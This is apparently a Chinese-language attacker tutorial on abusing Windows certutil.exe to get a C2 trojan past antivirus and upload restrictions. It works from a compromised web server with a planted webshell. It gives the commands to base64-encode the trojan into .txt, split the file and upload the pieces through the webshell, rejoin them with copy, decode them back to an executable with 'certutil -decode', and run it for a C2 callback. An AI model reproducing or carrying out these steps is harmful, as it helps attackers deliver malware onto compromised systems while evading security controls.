Certutil
Certutil.exe是Windows操作系统中的合法程序,主要用于管理证书相关操作。它提供了转储和显示证书颁发机构(CA)的配置信息、配置证书服务、备份和还原CA组件,以及验证证书、密钥对和证书链等功能,然而,由于其功能强大,很多攻击者滥用Certutil.exe程序将其用于攻击辅助,常用于远程下载,但不知道它还能加密解密本地文件(不会报毒,可以用来ByPassAV)
实战使用前提
在实战中有一种这有的场景,通过前期打点获取到了网站的入口,上传webshell拿下服务器网站权限,WebShell只能上传写入,有杀软和网站限制,只能上传txt,这种情况我就通过本次实战案例,给大家演示一下整个ByPass过程
加密exe格式木马为txt格式
首先,使用viper平台准备好C2木马,这里通过 Certutil -encode 1.exe 1.txt 命令进行加密导出,这里会修改exe格式为txt, 同时我们通过type查看命令,查看1.txt,看到文件有如下特征
Certutil 加密导出的特征
-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA5JBHdfUV/jn1Ff459RX+O
WoMEjn5Ff459RX6Of0V/jnQ96o58RX+OdD3ujnxFf45SaWNofUV/jgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA==
-----END CERTIFICATE-----
切割TXT文件并拼接、解密
由于某些场景会限制文件上传大小,没办法通过WebShell上传写入,可以通过将txt切割分为多个后上传
新建一个文件夹,全部上传,上传后目录如下所示
使用copy命令执行copy 001.txt + 002.txt + 003.txt + 004.txt 2.txt 将txt合并,按顺序拼接为2.txt,这里拼接后的2.txt文件内容与加密的1.txt一致
之后我们将加密导出的 2.txt 用 Certutil 进行解密操作,执行Certutil -decode 2.txt C2.exe 命令后,还原为我们的C2木马
如下图所示,已经还原为C2木马,我们执行,查看是否可以上线
到此一步已经完成上线,可进行后续操作
